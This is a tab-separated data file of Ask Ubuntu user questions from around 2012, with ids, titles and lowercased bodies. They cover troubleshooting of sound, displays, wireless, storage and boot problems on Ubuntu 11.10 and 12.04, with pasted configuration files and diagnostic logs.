112325	no sound with a creative labs soundblaster live emu10k1x	i just installed ubuntu . things seems great but i have no sound . when i go to the settings menu i chose from various setup . i found one that work which had 4 speakers a subwofer and a front speaker . when i test it the sound works fine . however , when i try playing an *.mp3 file or try to watch a video on you tube i get no sound at all . i have a dual boot with windows xp and there is no problem in windows at all . below is my setup . os : ubuntu 11.10 machine : dell dimension 8300 speakers : dell creative lab sounblaster live emu10k1x video : ati radeon r350 [ radeon 9800 pro ] secondary following https : //wiki.ubuntu.com/debuggingsoundproblems did not help .
112329	is there a unity launcher progress bar for transmission ?	like unityfox ( and the nautilus launcher ) , is there a way to have transmission 's launcher show the progress of a download ?
112332	2 tb hard drives and raid 5 in home server	i recently converted my home media server from windows server 2008 to ubuntu 11.10 . right now , there is a single wd20ears 2 tb hard drive formatted as ntfs that 's about to run out of space . i 'd like to purchase a few extra drives ( the case can hold an additional two ) . i have a few questions before i actually purchase anything though : the original reason i was running windows server was because of the way 4k sector drives are handled on linux . i 've since found this guide that might fix it , but i 'm also seeing people say that it did n't work . which 2 tb hard drives have the best compatibility , and where can i find a guide that will walk me through configuring the special partitioning for these drives ( or can i avoid the complications all together ? ) . i 'd like to use the existing 2 tb ntfs partition as part of the raid 5 . is there any way that i can do this without needing an external to back up the data ? it 's my understanding that raid 5 requires three disks , so it seems that if i wanted to purchase two extra drives , i 'd need to back up the data on the existing ntfs drive before building the raid . am i going about this the wrong way ? not too concerned about performance , just need lots of room for my media collection to grow . i can navigate my way through tutorials , but i lack the linux background to jump into this without some help . setting up and maintaining this server has been quite a learning experience for me . running on server : crashplan sickbeard couchpotato sabnzbd+ plex media server
112335	recommended memory for ubuntu 11.10 running on vm	am currently running ubuntu 11.10 on virtual box on my mac . i have the set the memory usage to 1.5 gb for this instance . my mac has total memory of 4gb . i would like to know , what is the recommended memory for ubuntu 11.10 running on virtual box .
112336	why does x-forwarding firefox take so long ?	i ssh -x from ubuntu to an ubuntu server , on which i 've installed x , x11-apps and firefox . running xeyes shows the eyes , so i know that the x forwarding works . but when i try firefox , nothing happens : no window pops up , and the terminal line is n't returned until i ctrl+c . how to debug this ? i do n't have physical access to the server . ps aux shows : me 22016 1.0 0.8 53464 9076 pts/1 s+ 17:20 0:00 /usr/lib/firefox-10.0.2/firefox me 22018 0.0 0.0 0 0 pts/1 z+ 17:20 0:00 [ firefox ] < defunct > update : after waiting for 8 min , a firefox window popped up and worked fine , without lag or any other problems . so the new question is : why does it take so much time ?
112338	why does firefox suddenly keep asking `` do you want to run 'start.htm ' , or display its contents ? '' on htm and text files ?	i 'm not sure what update or action i 've taken but ubuntu rather annoyingly now keeps asking the above every time i simply want to display a saved htm file in firefox . it gives me the option of running in terminal , displaying , cancel or run . it also doing it for text files as well . i have a duel boot with win 7 and several ntfs partitions for data that i share between ubuntu and win . i recently used ntfs-config to auto mount these partitions and since then this message has displayed . i want it to revert to its previous default behaviour . any one any ideas as to the how or why of it , as i 'm a new linux user and relatively perplexed by it ! # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # entry for /dev/sda9 : uuid=1c4cd258-c17f-4757-a6fc-4bf0f958a9d6 / ext4 errors=remount-ro 0 1 # entry for /dev/sda6 : uuid=01cce74276c39a10 /media/dataa ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda7 : uuid=01cce7427b43a3f0 /media/film ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda8 : uuid=01ccedc6f0f11260 /media/linux_storage ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda5 : uuid=01cce74272a05630 /media/music ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda1 : uuid=2e9834ec9834b465 /media/system_reserved ntfs defaults , nls=utf8 , umask=0222 0 0 # entry for /dev/sda2 : uuid=7c5639d8563993bc /media/sda2 ntfs-3g defaults , locale=en_us.utf-8 0 0 # entry for /dev/sda10 : uuid=a2fd0541-75b9-4ccb-8a51-f6074e042a37 none swap sw 0 0
112340	do i have to use `` eject '' in terminal to load a cd/dvd ( on sony vaio with eject button )	i have installed ubuntu 11.10 on my sony vaio vgn-ar61m as a dual boot machine ( i have to keep windows for the cad stuff i need for work ) . after looking at different answers on why my eject button wo n't work the only remedy i can find is that i have to use the `` eject '' command in a terminal window which seems quaint to say the least . is there a way to fix the button to work on the vaio ?
112343	what does the -d option do in update-manager ?	when i 'm updating my distro and i type in `` update-manager -d '' what does the `` -d '' do ? does it mean download ?
112347	unity application switcher overlay is stuck and doubled	about once every other day my ubuntu 11.10 desktop screen gets in a state where the application switcher overlay wo n't go away . this is the overlay in the middle of screen that appears when you press alt+tab . the mouse remains responsive but nothing i do will make the overlay go away . and then after pressing more keys , a second overlay ( with a different order of app icons ) appears over the first , and now neither will go away . i 'd like to know if i can fix this . but if i ca n't , then i 'd like to know how i can restart the desktop window manager but keep my tmux sessions intact .
112350	twinview dialog boxes all open in secondary screen	i 'm using twinview with oneiric 64bit with a nvidia card . i have my primary monitor ( with dvi ) positioned to absolute 0 and my secondary to the right ( with hdmi ) . my applications open on the primary monitor but all dialog boxes like the following opens on the secondary shutdown reload confirmation on firefox save changes to document on gedit admin passwords so when my secondary screen is not on , i am forced to each time alt + f7 in order to move the new box on the primary display that 's also doing it with some application windows but i got it corrected with ccsm window placement this question seems to be already asked but my problem concerns dialog boxes . dual monitor applications opening on wrong monitor
112355	how could i change my theme colors like this ? ( pic below ) or can i find a theme like this ?	i want my theme to look like this . how would i go about changing the colors to look like this or is there a theme that already looks like this that you ? i am using unity and gnome shell . is there a theme for both those desktop environments ? is there an application for changing the colors ? i 'm using ubuntu 12.04 beta 1 .
112356	ati radeon 5800 series dual monitor unity not 3d accelerated	when i had a single monitor setup , without xinerama , with my current setup of ubuntu 11.10 , ati 5800 series card , unity showed transparencies , shadows , etc . ( although graphics was reported as 'standard ' in the control/settings panel ) . having switched to a dual monitor setup , dell 24 '' ultrasharp and a smaller acer monitor , unity shows only as 2d , even though i 'm not loggin in to that display manager . webgl performance is very sluggish , i 'm getting the impression that the processor is doing all the work and the card is n't even accessible even though the drivers are installed ( from the ubuntu repository , i did not compile custom drivers ) . any tips on how to enable full 3d accelerationn and video card support . here is my xorg.conf file : section `` monitor '' identifier `` 0-dfp3 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1680x1050 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 0-dfp4 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1920x1200 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 subsection `` display '' endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -0 '' device `` amdcccle-device [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` amdcccle-screen [ 1 ] -1 '' device `` amdcccle-device [ 1 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` module '' load `` glx '' endsection section `` serverlayout '' identifier `` amdcccle layout '' screen 0 `` amdcccle-screen [ 1 ] -0 '' 0 0 screen `` amdcccle-screen [ 1 ] -1 '' 1920 0 endsection section `` device '' identifier `` amdcccle-device [ 1 ] -0 '' driver `` fglrx '' option `` monitor-dfp4 '' `` 0-dfp4 '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` amdcccle-device [ 1 ] -1 '' driver `` fglrx '' option `` monitor-dfp3 '' `` 0-dfp3 '' busid `` pci:1:0:0 '' screen 1 endsection section `` serverflags '' option `` xinerama '' `` on '' endsection more info : fglrxinfo display : :0 screen : 0 opengl vendor string : ati technologies inc. opengl renderer string : ati radeon hd 5800 series opengl version string : 4.1.11005 compatibility profile context
112357	accton smcwusb-g 802.11bg wireless adapter does not initialize	i dual-boot ubuntu and windows . if i shutdown my pc , and then turn on and boot in ubuntu , my usb wireless adapter does not initialize . i currently have 2 workaround : unplug usb adapter , then plug in ( while in ubuntu session ) boot in windows , which does n't have this problem , then restart ( without turning pc off ) and boot in ubuntu i use mainly second option , but would appreciate real solution to this problem . if i just reboot ubuntu , without tuning pc off , then everything is fine here is update information : $ lsusb bus 001 device 002 : id 083a:4505 accton technology corp. smcwusb-g 802.11bg $ sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 02 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:40 ioport : e800 ( size=256 ) memory : fdeff000-fdefffff memory : fdee0000-fdeeffff memory : febe0000-febfffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:2 logical name : wlan0 capabilities : ethernet physical wireless configuration : broadcast=yes driver=zd1211rw driverversion=2.6.38-13-generic firmware=4725 link=yes multicast=yes wireless=ieee 802.11bg second update : i compared dmesg logs from successful init , and from init failure , and here is what seemed relevant to me : first in both logs is line : usb 1-2 : new high speed usb device using ehci_hcd and address 2 which i assume is referencing this wlan adapter , and then only in session that failed to init my wlan adapter : hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 9 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 17 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 18 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 19 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 20 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 22 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 23 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 27 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 31 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 32 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 33 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 37 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 43 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 44 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 48 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 49 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 51 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 57 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 58 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 65 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 72 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 78 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 79 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 84 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 85 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 86 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 87 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 89 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 hub 1-0:1.0 : unable to enumerate usb device on port 2 usb 1-2 : new high speed usb device using ehci_hcd and address 93
112359	how can i remove the unity launcher , but keep the dash home menu ?	is it possible to remove the unity launcher ? i 've replaced it with a different launcher ( dockbarx ) however i would like to keep the dash home feature . i do n't need a button if i can control it with the super key . so far my workaround was to comment out everything in /usr/share/unity-2d/shell/launcher/launcher.qml , however windows will no longer go fullscreen as the space that was previously used by the unity launcher has remained .
112360	will a server install suspend if i close the lid ?	i have a spare laptop hp elitebook 8540p on which i wish to install ubuntu server 11 and keep the lid closed . i have installed ubuntu server on a desktop before , but never on a laptop . will the server shutdown if i close the lid ? is there any bios settings that i can tweak ( like disabling the graphics card ) to optimize the performance ? the server needs to run day in and day out .
112365	cursor ghostly jumps with touchscreen in 11.10	i think this is related to xserver somehow , but when i 'm using paint programs like gimp or inkscape in 11.10 with either the pen or touch inputs , occasionally the cursor will just jump to the edge of the screen , ruining the whole line , and making drawing impossible . how do i troubleshoot this ? some things that might be relevant ? http : //ubuntuforums.org/showthread.php ? t=1676062 & page=2 http : //ubuntuforums.org/archive/index.php/t-1785015.html
112367	screen does not lock when locking is enabled	when i installed ubuntu 11.10 , i had a single monitor attached to it . the screen was locking perfectly fine . since then i connected two monitors to the system and replaced video card to another brand . all seems fine except for screen locking not working anymore . when you go to lock settings , all are there , but the screen just does not lock . you can lock manually , though . i tried to disable locking , then restarted , and re-enabled it . still no luck . any suggestions would be greatly appreciated !
112372	`` invalid argument '' error when trying to back up to a windows share	i am trying to use deja-dup to back up my ubuntu server to a windows shared drive . i have entered the needed information however , i keep getting `` invalid argument '' . how to use deja-dup with windows share ? info : ubuntu 11.10 back up to : windows shared server . any suggestions .
112374	why delete .hidden folders in home when reinstalling broken programs ?	for things like dealing with skype and pulseaudio problems , i 'm routinely advised by various internet sources to delete my foldername folders in my user 's home directory ( such as .pulse .skype ) . it does generally seem to work . what is this actually doing , and why am i advised to do it ? also , if this does fix programs , why are n't they set to delete their own folders there ? what are these for when they work ?
112377	how to effectively move ubuntu server from a virtualbox to a dedicated server ?	i run ubuntu server 11.10 i386 with virtualbox . i want to create and move a complete backup to a dedicated computer . if possible downtime has to be cut to a minimum because the site is running right now . i cant move only the webpage because i have a lot of settings , databases and daemon that took a long time to setup . what are my option to easily move my virtual server to another computer that will not run virtualbox ? i have ssh and physical access to both server .
112380	different memory types in system monitor	on the ubuntu system monitor there are different types of memory listed : virtual memory , resident memory , writeable memory , shared memory & x server memory . what are the differences between them , and which reflects the actual ram usage of the process ? sorry if it 's a newbie question : )
112381	unity 2d exit icon not showing	i wanted to switch over to unity 2d because it uses less memory , however the exit , minimise , and maximise buttons are n't showing , with just a black bar . also the running programs do not appear in the launcher - when they are launched they appear , flash for a bit , then disappear again . programs pinned to the launcher , like google chrome , flash for a bit then return to normal , with no arrow indicating the program is running .
112390	live usb data gets lost on restart	i am crawling some data using apache nutch and storing it on my usb drive . the os itself is ubuntu live boot os . but for every restart or shutdown i am losing my data . i also tried suspending my ubuntu user still data was not visible when i reinserted my live usb . is there any way i can keep the data intact and does not loose and application settings installations when i do restart ubuntu . used usb installer provided by pendrivelinux.com at http : //pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ # button
112391	how can i run php scripts without prefixing my scripts with sudo ?	i 'd like to be able to run php scripts without needing to use sudo in every command . my user is not root obviously . how can i accomplish this feat ? i 'm new to linux , and i have a little knowledge of permissions , but assume i do n't . i thought php scripts would be sent to the background and run under a different user that does have root permissions , and the user kicking those scripts off would n't need to have the same access . in any case , the php scripts will need database read/write access , will need to be able to read/write files , will need access to start/stop the apache web server , and any other task that a typical php script does . if i 'm scheduling these scripts with anacron , do i need to do anything differently ?
112392	connect to kvm instance via vnc and view x session	i 've launched an ubuntu 11.10 instance ( oneiric-server-cloudimg-amd64-disk1.img downloaded from here ) inside of kvm , with vnc enabled . i can connect to the instance using vnc , and i see a login prompt . i 'd like to be able to use this vnc connection to show an x session instead of a text prompt . what do i need to install/configure so that this vnc session exposed through kvm shows an x11 session ? ( note that i can successfully switch between tty [ 1-6 ] by doing ctl-alt-f # ) .
112394	is it possible to keep custom pcm loudness level ? what resets it to 100 all the time ?	can it be done or not ? if yes , then how ?
112395	what might cause a laptop to suddenly turn itself off while running ubuntu , but not while running windows ?	a friend was complaining that her 3 year old windows vista install was taking `` up to an hour '' to become usable after booting , so i offered to take a look at it . there was a whole mess of stuff starting up on boot , but i broke the windows habit before vista was invented so do n't know what 's essential and what is n't . i ended up installing ubuntu 11.10 on her empty d : drive and leaving her with a dual boot . i installed the `` xfce4 '' package because it was defaulting to a weird looking desktop with square icons down the left hand edge . now it looks more like the windows interface she 's used to . all seemed well until the next day when i received this from her : hi , chris ! everything is really working well so far , thank you so much again ! ! ! ! the only thing that is happening today is that the laptop is randomly shutting itself off while i 'm typing . i have n't hit the button , the battery is fully charged , etc . i 'm just going along , typing away , and all of a sudden it turns itself off . any ideas why that would be happening ? other than that , i 'm really happy with the changes . : -d any idea what the problem might be ? windows on the same computer never just powers off . it 's a 2 ghz celeron machine from 2008 or so , and she 's doing nothing very intensive on it . email in google chrome and documents in libre office is the extent of it . i set up a 3gb swap partition , so i doubt it 's running out of swap , and am stuck for ideas . it 's an acer aspire 5315 icl50 .
112402	no mobile broadband connection on ubuntu 11.10	i installed ubuntu 11.10 and from start i have no mobile broadband in my network indicator . it used to work form live cd but when i installed it , mobile broadband was n't listed at all . when i plug in my 3g usb modem stick i get in /var/log/syslog : mar 12 21:08:12 goran-home-ubuntu kernel : [ 1349.648137 ] usb 2-4 : new high speed usb device number 13 using ehci_hcd mar 12 21:08:12 goran-home-ubuntu mtp-probe : checking bus 2 , device 13 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-4 '' mar 12 21:08:12 goran-home-ubuntu kernel : [ 1349.786894 ] scsi16 : usb-storage 2-4:1.0 mar 12 21:08:13 goran-home-ubuntu mtp-probe : bus : 2 , device : 13 was not an mtp device mar 12 21:08:13 goran-home-ubuntu usb_modeswitch : switching 1bbb : f000 ( usbmodem : hspa data card ) mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.025293 ] usb 2-4 : usb disconnect , device number 13 mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.392152 ] usb 2-4 : new high speed usb device number 14 using ehci_hcd mar 12 21:08:14 goran-home-ubuntu mtp-probe : checking bus 2 , device 14 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-4 '' mar 12 21:08:14 goran-home-ubuntu mtp-probe : bus : 2 , device : 14 was not an mtp device mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.536138 ] option 2-4:1.0 : gsm modem ( 1-port ) converter detected mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.536280 ] usb 2-4 : gsm modem ( 1-port ) converter now attached to ttyusb0 mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.536412 ] option 2-4:1.1 : gsm modem ( 1-port ) converter detected mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.536503 ] usb 2-4 : gsm modem ( 1-port ) converter now attached to ttyusb1 mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.536932 ] scsi17 : usb-storage 2-4:1.2 mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.537215 ] option 2-4:1.3 : gsm modem ( 1-port ) converter detected mar 12 21:08:14 goran-home-ubuntu kernel : [ 1351.537350 ] usb 2-4 : gsm modem ( 1-port ) converter now attached to ttyusb2 mar 12 21:08:14 goran-home-ubuntu usb_modeswitch : switched to 1bbb:0000 ( usbmodem : hspa data card ) mar 12 21:08:15 goran-home-ubuntu usb_modeswitch [ 32008 ] : usb_modeswitch : adding device id 1bbb:0000 to driver option mar 12 21:08:15 goran-home-ubuntu kernel : [ 1352.538247 ] scsi 17:0:0:0 : direct-access usbmodem mmc storage 2.31 pq : 0 ansi : 2 mar 12 21:08:15 goran-home-ubuntu kernel : [ 1352.564799 ] sd 17:0:0:0 : attached scsi generic sg2 type 0 mar 12 21:08:15 goran-home-ubuntu kernel : [ 1352.571989 ] sd 17:0:0:0 : [ sdb ] attached scsi removable disk it looks like usb modem is ready ( i get flashing green light ) but nothing happens . i do n't know if this is related but , in my network settings airplane mode to alway on and i ca n't even switch wireless on and airplane mod to off . note also that there is no mobile broadband option in network settings . when i run lsusb i get this : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 04f2 : b128 chicony electronics co. , ltd bus 002 device 016 : id 1bbb:0000 t & a mobile phones bus 008 device 002 : id 0930:020f toshiba corp. edit : i use alcatel x080s 3g usb modem stick .
112403	network gui tools in 11.10+ ( whois , dns checker , trace route , etc ... )	in older versions of ubuntu there was this `` network gui '' program that had a whois option , tracing , pinging and all the terminal commands for network but in gui . if i can recall , i think it was before unity came to play , maybe before 11.04 . how can i , using 11.10 with unity ( do not want to use gnome2 or gnome3 , just unity ) , get to this network swiss army program or what package installs this program .
112406	how do i prevent telnet from timing out ?	is there a way to disable a telnet session from my desktop to a server from timing out , ever . this should be done from the client if at all possible .
112411	wireless security ( wpa + wpa2 ) passwords not accepted ; wireless security = 'none ' is functional	hi i am new to linux coming from mac . i have several macs and formerly windows systems connecting to netgear wpn824 router wirelessly . i just installed ubuntu 11.10 on my daughter 's samsung nc-20 netbook ( she 's catching on to the fact that windows belongs in the trash ) . the nc-20 uses a atheros 802.11 b/g . i can get the wireless to connect successfully when security 'none ' is used but not when wep or any form of wpa is set up on the router . network connections requests the password with no joy . here is an ifconfig -a listing . i have looked for solutions but have n't seen any that address this issue in a way that i can understand/or use . what steps do you recommend that i use to isolate this problem . thanks , n eth0 link encap : ethernet hwaddr 00:13:77 : e4:30:2f inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :213:77ff : fee4:302f/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9229 errors:0 dropped:0 overruns:0 frame:1 tx packets:8320 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9745749 ( 9.7 mb ) tx bytes:1055834 ( 1.0 mb ) interrupt:36 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 00:24 : d2:6a:7a:76 inet6 addr : fe80 : :224 : d2ff : fe6a:7a76/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:5230 errors:0 dropped:0 overruns:0 frame:0 tx packets:2807 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:6182304 ( 6.1 mb ) tx bytes:414637 ( 414.6 kb )
112414	ca n't boot ubuntu 11.10 after installing alongside windows 7 ?	i 'm really not good with computers . i recently got a new one with windows 7 . i installed ubuntu on my old computer and used it with no problem . i decided to install ubuntu alongside windows 7 on my new computer by using the alternate cd that i burned . when i start the computer the boot menu comes up , but if i select ubuntu is does not load . it comes up with a purple screen for a few seconds , but then goes blank and switches from a black screen to a blueish screen , like it 's trying to do something but does n't . i 've gone into recovery mode successfully but have no idea what to do once i get there .
112418	lighter in cpu/memory usage : lubuntu or xubuntu	i am looking for an ubuntu version that consumes less memory and cpu . i have read both lubuntu and xubuntu ( the homepages , wikipedia , phoronix and other sites comparing both ) . but from experience , which one uses less memory and is less cpu intensive . i need to install them in very old hardware and want to persuade the owner of the hardware of the benefits of ubuntu . in this case i want to install 11.10 or 12.04 when it comes out . how are each behaving in those versions ? the 2 pcs i will be installing either xubuntu or lubuntu are : granpa pc : cpu - pentium 2 450mhz ram - 64mb dimm video - 16mb used for - documents and internet . no listening to music , no looking at videos . just using it for document writing . the other old meat : cpu - pentium 3 550mhz ram - 128mb dimm video - 16mb used for - documents and internet also but they want.. or maybe they are wishing for it to use it to see movies and listen to music . this one has internet . the other one does not . update wanted to update this question with the test results for over 8 months worth of using lubuntu and xubuntu . when it comes to very old hardware , am talking about 64 mb , 128 mb or even 256 mb of ram computers , lubuntu is better than xubuntu when comparing memory usage . when it comes to cpu usage , both are the same . this will not improve i/o disk performance which will be the bottleneck for old computers . also the difference in performance between xubuntu and lubuntu is about 10 % to 20 % percent in memory usage . again , cpu usage is the same . now , when it comes to how responsive the desktop is , lxde ( lubuntu ) has a much better response time than xfce ( xubuntu ) . i would say about 50 % or just simply noticeable to the eye . lubuntu is similar to how windows xp looks while xubuntu is more like how gnome 2 looked . the computers ( the old ones mentioned here ) and 2 more are still working in excellent conditions thanks to the ubuntu family . i also want to add i am using 13.10 for both distros .
112424	how can i change the kubuntu 12.04 default arguments for package unclutter ?	kubuntu 12.04 comes with unclutter which causes the mouse cursor ( pointer ) to disappear after 1 second of being stationary . i find this most annoying . where can i change the idle time setting and other settings kubuntu specifies for unclutter ?
112425	any way to update bios for asus x101h without windows ?	i have tried everything and no matter what the ezflash that comes with the netbook is not working for reading my usbs , whether fat16 , or fat32 . in windows , asus has their update tool which updates the bios easily , but is there any way for me to do this in ubuntu ?
